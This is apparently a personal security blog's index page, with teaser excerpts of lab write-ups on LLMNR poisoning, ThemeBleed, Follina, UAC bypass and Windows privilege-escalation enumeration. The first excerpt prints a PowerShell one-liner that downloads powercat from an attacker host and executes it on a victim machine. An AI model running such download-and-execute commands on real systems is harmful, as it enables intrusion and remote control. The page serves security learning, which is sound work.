init In one case I have discovered some strange issue which I have never faced before. I was trying execute a powershell command as shown below: IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1') How ever interestingly, if I use CyberChef to encode the above command to base64 so that I can use powershell -e to decode the code and then execute on the victim machine. If the encoding is done on the CyberChef, we get the below:

Continue reading

In this case, we will look into how we can use LLMNR to poisoning to get the hash for a specific user and crack that in order to gain access. We have a domain called master.loc where the domain controller is dc1. The client workstation is client1. LLMNR is a protocol which is used to discover any hosts present in the network. In our scenario, we will try to access a fileserver called wow.

Continue reading

Themebleed exploit

init Lets try to exploit the yet-another-windows-vulnerability known as CVE-2023-38146 aka ThemeBleed. To do that we need to create the theme file which will consist of “path” from where the payloads will be delivered. Please note that as per my testing, the command execution only happens if both the SMB server and the theme file is in the same machine. Pulling dll(s) from remote system appears not to work. In the attacker machine, you will need to disable the SMB by disabling the Server service from the services.

Continue reading

init The primary objective of this writeup is to check if an attacker can use this technique to bypass UAC and gain additional privilege ONLY using Command / Powershell window got from a Reverse Shell. User Account Control (UAC) in Windows is a “feature” (do not know how to attribute it) which can be used to prevent a user from making unwanted changes into the system. When running a application in a privileged permission, Windows asks the user if the action is actually legit.

Continue reading

Follina exploit

In this tutorial we will go through the very easy to exploit Follina (CVE-2022-30190) which can be used to perform command execution. This is a easy to build exploit as command can be executed on the remote system witout any promot. As this exploit does not require any macro for exploit, and the complexity of the development is easy, attackers can easily use this to enter enterprise network via email and opening the file using Microsoft Office.

Continue reading

In the windows environment, to escalate privilege various information about the target system is needed. Unfortunately Windows systems are not as easy as Linux specially in the case of terminal and obtaining information from the shell. Everything in Windows systems seems twisted and made intentionally complex. You will have to remember a lot of tools other commands just to grab the basic informations about the system. Below I have listed down some of the commands which should help.

Continue reading

Author's picture

rezaur rahman

just thinking out loud to help others

cybersecurity researcher

Mars